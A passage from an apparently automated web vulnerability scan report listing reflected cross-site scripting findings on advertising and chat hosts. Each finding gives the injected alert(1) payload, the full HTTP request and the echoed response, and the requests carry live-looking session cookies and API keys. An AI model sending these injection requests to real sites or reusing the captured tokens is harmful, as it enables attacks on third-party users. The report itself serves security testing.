Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo3=12309:27904/5712:3840/13198:5934/15902:34879/10105:2060/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:01:00 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 20:27:38 GMT
ETag: "49f4c7-10a4-49eb37e0da280"
Accept-Ranges: bytes
Content-Length: 4716
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://altfarm.mediaplex.com/ad/ck/12309-125186-27904-1?mpt=2011.04.27.21.56.019aede"-alert(1)-"ae9c8a7
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F12309-125186-27904-1%3Fmpt%3D2011.04.27.21.56.019aede"-alert(1)-"ae9c8a7b785");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F12309-125186-27904-1%3Fmpt%3D2011.04.27.21.56.019aede"-alert(1)-"ae9c8a7b
...[SNIP]...

3.485. http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83f73'%3balert(1)//4735cdcec19 was submitted in the mpck parameter. This input was echoed as 83f73';alert(1)//4735cdcec19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-125186-27904-1%3Fmpt%3D2011.04.27.21.56.0183f73'%3balert(1)//4735cdcec19&mpt=2011.04.27.21.56.01&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://reviews.cnet.com/cell-phones/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo3=12309:27904/5712:3840/13198:5934/15902:34879/10105:2060/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:01:00 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 20:27:38 GMT
ETag: "49f4c7-10a4-49eb37e0da280"
Accept-Ranges: bytes
Content-Length: 4722
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://altfarm.mediaplex.com/ad/ck/12309-125186-27904-1?mpt=2011.04.27.21.56.0183f73';alert(1)//4735cdc
...[SNIP]...
<a href="http://altfarm.mediaplex.com/ad/ck/12309-125186-27904-1?mpt=2011.04.27.21.56.0183f73';alert(1)//4735cdcec19" target="_blank">
...[SNIP]...

3.486. http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e35dc"><script>alert(1)</script>be0908e0e29 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-125186-27904-1%3Fmpt%3D2011.04.27.21.56.01e35dc"><script>alert(1)</script>be0908e0e29&mpt=2011.04.27.21.56.01&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://reviews.cnet.com/cell-phones/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo3=12309:27904/5712:3840/13198:5934/15902:34879/10105:2060/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

3.487. http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42138'%3balert(1)//94b5db46174 was submitted in the mpvc parameter. This input was echoed as 42138';alert(1)//94b5db46174 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-125186-27904-1%3Fmpt%3D2011.04.27.21.56.01&mpt=2011.04.27.21.56.01&mpvc=42138'%3balert(1)//94b5db46174 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://reviews.cnet.com/cell-phones/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo3=12309:27904/5712:3840/13198:5934/15902:34879/10105:2060/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:01:00 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 20:27:38 GMT
ETag: "49f4c7-10a4-49eb37e0da280"
Accept-Ranges: bytes
Content-Length: 4718
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="42138';alert(1)//94b5db46174http://altfarm.mediaplex.com/ad/ck/12309-125186-27904-1?mpt=2011.04.27.21.5
...[SNIP]...
<a href="42138';alert(1)//94b5db46174http://altfarm.mediaplex.com/ad/ck/12309-125186-27904-1?mpt=2011.04.27.21.56.01" target="_blank">
...[SNIP]...

3.488. http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5383"><script>alert(1)</script>d418d5dc82 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-125186-27904-1%3Fmpt%3D2011.04.27.21.56.01&mpt=2011.04.27.21.56.01&mpvc=a5383"><script>alert(1)</script>d418d5dc82 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://reviews.cnet.com/cell-phones/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo3=12309:27904/5712:3840/13198:5934/15902:34879/10105:2060/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

3.489. http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acd3d"%3balert(1)//2c29242d7d was submitted in the mpvc parameter. This input was echoed as acd3d";alert(1)//2c29242d7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-125186-27904-1%3Fmpt%3D2011.04.27.21.56.01&mpt=2011.04.27.21.56.01&mpvc=acd3d"%3balert(1)//2c29242d7d HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://reviews.cnet.com/cell-phones/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo3=12309:27904/5712:3840/13198:5934/15902:34879/10105:2060/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:01:00 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 20:27:38 GMT
ETag: "49f4c7-10a4-49eb37e0da280"
Accept-Ranges: bytes
Content-Length: 4713
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="acd3d";alert(1)//2c29242d7dhttp://altfarm.mediaplex.com/ad/ck/12309-125186-27904-1?mpt=2011.04.27.21.56
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("acd3d";alert(1)//2c29242d7d");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("acd3d";alert(1)//2c29242d7d");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("acd3d"%3balert(1)//2c2924
...[SNIP]...

3.490. http://init.zopim.com/register [mID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://init.zopim.com
Path:	/register

Issue detail

The value of the mID request parameter is copied into the HTML document as plain text between tags. The payload c3f62<script>alert(1)</script>ad1b00c1dd8e14765 was submitted in the mID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /register?swfVer=2371&mID=c3f62<script>alert(1)</script>ad1b00c1dd8e14765&url=http%3A%2F%2Fwww%2Ewitopia%2Enet%2Findex%2Ephp%2Fproducts%2F&ua=Mozilla%2F5%2E0%20%28Windows%3B%20U%3B%20Windows%20NT%206%2E1%3B%20en%2DUS%29%20AppleWebKit%2F534%2E16%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F10%2E0%2E648%2E205%20Safari%2F534%2E16&jsVer=0%2E4%2E0&tabId=%5Fflash%5Fda1009223648178cb6660cae9ca901aea355b25e&ak=3palS2Mtb3KPYyaaIt2gqxWdGyicuWAy&sk=022cc4051849972347c7a585c677fb8f4fd46948&accountKey=3palS2Mtb3KPYyaaIt2gqxWdGyicuWAy&ref=&title=Products%20%26%20Services%20%7C%20WiTopia%2ENet HTTP/1.1
Host: init.zopim.com
Proxy-Connection: keep-alive
Referer: http://cdn.zopim.com/swf/ZClientController.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 27 Apr 2011 21:15:04 GMT
Connection: keep-alive
Content-Length: 1582

{"status": "online", "__status": "ok", "name": "Visitor 273566248", "settings": {"chatbutton": {"hideBubble": false, "position": "br", "theme": "bar", "hideWhenOffline": true}, "chat_request_form": {"
...[SNIP]...
e will reply shortly.", "bar": "Leave a message"}, "online": {"window": "Leave a question or comment and our agents will try to attend to you shortly =)", "bar": "Click here to chat"}}}, "machineID": "c3f62<script>alert(1)</script>ad1b00c1dd8e14765", "nick": "visitor:273566248", "host": "lc08.zopim.com", "chat": {"members": [], "history": []}, "sid": "sW3k33KUV1cGJka2Aw8I3511O19HSuNXv6oClcjk", "groups": [["WiTopia Sales", "online"], ["Technical
...[SNIP]...

3.491. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload fa1c6<script>alert(1)</script>9e9877152ca was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K05540fa1c6<script>alert(1)</script>9e9877152ca HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4ddcf645&0&&4db782ef&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4ddd4f0f&0&&4db785ef&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4ddd5040&0&&4db783f9&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4ddd50a2&0&&4db7974a&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8JaSpnph4dB7K/U2jMfE8lTEE/bBfSBcpbV2KoO1W4tdUhcmPr/tPhssKTAE9WG5SkCWHZzOWCMU/1cuZQJw+GOYQVMu0qX2LAPFkexGbB71rJtmAuEe5dbPZx3FWbiKiNsUy6ig1HT1M8ntMXI7+HQ4+jfdaDmfwiffn86GxyBgl2+rg3BpihaHO/tCL/Wx1EtrDgtgPrHs/LpMmM9SJ9tZ2qB8v4jnLZzaUfB5WI2dAt298GlI+8ZRCqSiX8YLmjVIk8PrWugRQiJzXiPxh4blWLuUugCHIc4j/as9Qgjgm2n8G9lWloj9NahMVelRs3jTWv4NTkx7U8pnCzrTwTKv4fPGJZL5Rb5/0a+F1NjgD6NjR3gf2WxaodeONyjIKVcEhf8JG6hxBM4XGu6vQBG0WUoE86aXOqSVRYPlLKlTw8aLm312SQlXh2T93qlTshj3imBRZKXBdubjuEnYLAC1711mZivKVnquUtA78jW1PXc22z3DVydY+kSKPOLwV4SRABCFNDh+TeV+8ZR5qOQI/w3IwiaNIzc0Z2inbVYspmpVQjH0uo8AgGZbCGJ8JgAxk9tduefz20CoET2bvOOEjr+UoFh3tEnTu89kv2QnfTPvF8RQvPksJKhbN1IAYn9KKg+wGfvBsTRyRn9n1rKW1ZYdHhyew80FsLhjf4pmfuLBv9PLbqv0U6FCItwKXHdoyrDg0TAceCFRqV9ykg37/q5cV7vWKiRDpH+plqjhiMKZDHM7ZOQTsl3Ju2yrZfp8QilQnUwihOZ85x29gXkNLN+/RBYbrwvw03CPRRsyL9PgU8X6sKxC+XpG0SviTG5QxOe+xKEpe4L9Nn37mfgJ4AlqY14YM5YSbuEOGHjDno7PLTzQ+0+Ma/2811D976rzmpPwlY8+UxXAmZNgRdyPNMh+uq7Xqd42fk4SBzjAmQcKj5Gr6OR6yDm5C1Tt0blrv1ZGVSj8xMEVVOYEEz0HtUmHZABGBfPG0Dfar20yf5br4FOjjiaddbjicNZBu1; rsi_segs_1000000=pUPNOU/FLnIYV7WdI0UlJ/kC+eSm/y5dYuQTG0FsUMRcf9pgr35LMVCwgSvXJeTQ0rONm6X8KIPuA1izRfJwL7JGucHGeA9cGtHZdhQZcs13RlabvNbl0hdbomuAHyO7gzdizxhI/HnwOFi6RxKzX4SG6d/1BF3yRmeaLrU/vTWakXxWly1w0BZIK7uKnGWrHWP0j8AjN0Glg80dsj3lteFfwFwW+eP7azQUa+cuXMTP; rtc_IJE3=MLsHs6VKcT5n55A+/pn9fKn+4W3DpcBWuM7Yag+RCp1X1EtYDomAxaFV9HKcbJQKKb4120szLAY6DXbY0wwL17SBUZK7H+Od5Lmhswu1XWd8JEzGqKrDb75B5NBHuitFoRYU1SsnHmohQJpo+OxtrL4y6dGTuLe1Q+TNlYeFUJi4YTPD4ojItUcmu+18+umeZiqzIDg+5xrOlAD6RAZTGdw+6nbdBGOH35K6AKPV3CYJpa/4xeDPjz0Ce89kWqBDqSLAKJVImGGwZ2KYI4RRWJWDSGPRUqf4zssmDRXdKYHr6SqUM5loyHBB9aqy95BPinSIsVbOzrSlGYGZWwW1Fl3sputV7a34bOTJQyVogbc7jItozW2VYvCR+d5GwZxiEe+V/bGslP4x+FbQZlHVCeqUogR3ZNYgTMHfXFr3wZx7E3Ky86qpl17cTPCFWv6G+SM=; rsiPus_kjqe="MLsXrN8vcS5jIDH3TkIzV5AuC0W2u86F7odjMpPWFVoRB1R2RSFIK0cI5P9JxXU5TytEcEwsQ9oWBuuvI3ShFik1yyGQrvvs86NFhkANMUwRWRIf5m9GAHq2Ap2nmIDSFbu6pynHz0jzar60nXnqutohtjZ9zCz9s9sDxfxDgg7DUyzDghqJj8HL/9tn5ph+aEKI6oAmXT+Ebq/+rEp3Nk6zY/hhYy+kazl1MOz9sEDoJ+uPGv36C+GZrbGNfJG2wEiZ6WQ1IVfWkJSaQcine4fHevMMvhrBZCfVdIshrLT+TXMOUSV5abIFs66jOhZINzNmMcRUtyktjQV91aQLIIaonZeDCzeywY3GeXWRDDr5NnXMApNFsCuHKYMKzPfNTGIqyE13WKoVDc0smDN4qycWzbvz1sFOBknJEGk3H/ePdYkDpUk="; rsi_us_1000000="pUMdJD9HMAYYlW23kD0KtGT3h35jqRUtb3gj+ssD/slmFs510CNA9Q82rmxqeNa/V/R9Kc0pOxT9WRJMgXOcZvgza0Qexo1z8ZDze8zrQefVjGJJggONLCZAL2uM/BRijzG3ZBbn+tQRZkR0o/cDPDVz48b8v8kmtNlLAHVB6gil+1MGvHuV77kkZv7WFRQ08ey8biBkrz+GsSGViJZIiU8Fvs28/eVZQmTltxF5fOTjULcU7uQpjnG4qWl1n6qjLK4C3G7HnFo115DKSzx2rw913XEj3SOyT1QRDEweNRVYyMm9wWoG1UNHNdkNc7vl6K2yUDtRRh6dEwcD0I5TjmHy7YP91cMnhhlZ/pQEKoVUT5RiTu0iJOrhretCt5O2mNwHmK0AKjP7PdumTghUnA9rPCyeaI6E33P9jCLupc7aAQG+1PvDCt5aT5rorZPbBBVUs7p43wwWAF/c7x6e76RMrmgeF6d5uNa3VgLv+HCXU9Oru2WTP5PdayxSIW0MTCFKaJPzl/EaytOndBZXy076CBl03hMqzmAwBor8s7lo8RrBcAaVZP8AeySP1ywH+02de/16c+knmRnB98Vg25AtIyCaCtQmCi7kv6CRZLK0oB1lJd7IgUQLI9wh9kMa3+4XYzLDJrsAhcKKYfHrfCRrLxV8nremGCqQVcJCbB/q9T5ZrcklZVrbeiGA0JzUFKbsa/9uhBo2Hs7mlgI/D/pB+SGZJ/JVKEeDVvxXU+Cp7kFY2su8bEi+dawXUG2kRW1uMjQKsZKkWMqaa0CMbJFNkcqd6zbZHfm4bwKc4OXOnNFwXw/aKUDhXGZdNiAABShzNk3nILNvQItL4THNhM8N7ZMQUth8AC8W/wU4B/X3s0NZOiODQtQsROLI16ttXJmro74rujOmKxoSTE0slD1xNSelANtb2eSjrSJ66ZJ37rQFq+G01MF+Ut51mJWulucuTex3nDduoMbDR2ruQvioMlWcA790yqBF+8kVlEu6ZoO5f6FIvUcrlXQ2AClcyVBbFqb54MejEsT9c61cLFY5n5csD1Qn"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 27 Apr 2011 21:56:51 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 28 Apr 2011 21:56:51 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 21:56:51 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K05540FA1C6<SCRIPT>ALERT(1)</SCRIPT>9E9877152CA" was not recognized.
*/

3.492. http://linkdr.net/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://linkdr.net
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1e588<script>alert(1)</script>32a63868cd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1e588<script>alert(1)</script>32a63868cd8=1 HTTP/1.1
Host: linkdr.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Status: 404 Not Found
X-Powered-By: PHP/5.2.13
Content-type: text/html
Date: Thu, 28 Apr 2011 12:43:11 GMT
Server: lighttpd/1.4.20
Content-Length: 1248

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="mssmarttagspreventparsing"
...[SNIP]...
<b>/?1e588<script>alert(1)</script>32a63868cd8=1</b>
...[SNIP]...

3.493. http://linkdr.net/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://linkdr.net
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd828<a>ade16a08c67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icobd828<a>ade16a08c67 HTTP/1.1
Host: linkdr.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d56d5a11c63435b4c60d54d84e29f5da; __utma=179156665.746306493.1303994599.1303994599.1303994599.1; __utmb=179156665; __utmc=179156665; __utmz=179156665.1303994599.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Status: 404 Not Found
X-Powered-By: PHP/5.2.13
Content-type: text/html
Date: Thu, 28 Apr 2011 12:43:44 GMT
Server: lighttpd/1.4.20
Content-Length: 1234

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="mssmarttagspreventparsing"
...[SNIP]...
<b>/favicon.icobd828<a>ade16a08c67</b>
...[SNIP]...

3.494. http://linkdr.net/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://linkdr.net
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c28c2<script>alert(1)</script>62fe44a1f1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c28c2<script>alert(1)</script>62fe44a1f1e=1 HTTP/1.1
Host: linkdr.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d56d5a11c63435b4c60d54d84e29f5da; __utma=179156665.746306493.1303994599.1303994599.1303994599.1; __utmb=179156665; __utmc=179156665; __utmz=179156665.1303994599.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Status: 404 Not Found
X-Powered-By: PHP/5.2.13
Content-type: text/html
Date: Thu, 28 Apr 2011 12:43:41 GMT
Server: lighttpd/1.4.20
Content-Length: 1259

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="mssmarttagspreventparsing"
...[SNIP]...
<b>/favicon.ico?c28c2<script>alert(1)</script>62fe44a1f1e=1</b>
...[SNIP]...

3.495. http://mads.bnet.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload 72368<a>f636bfc26e7 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=172368<a>f636bfc26e7&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
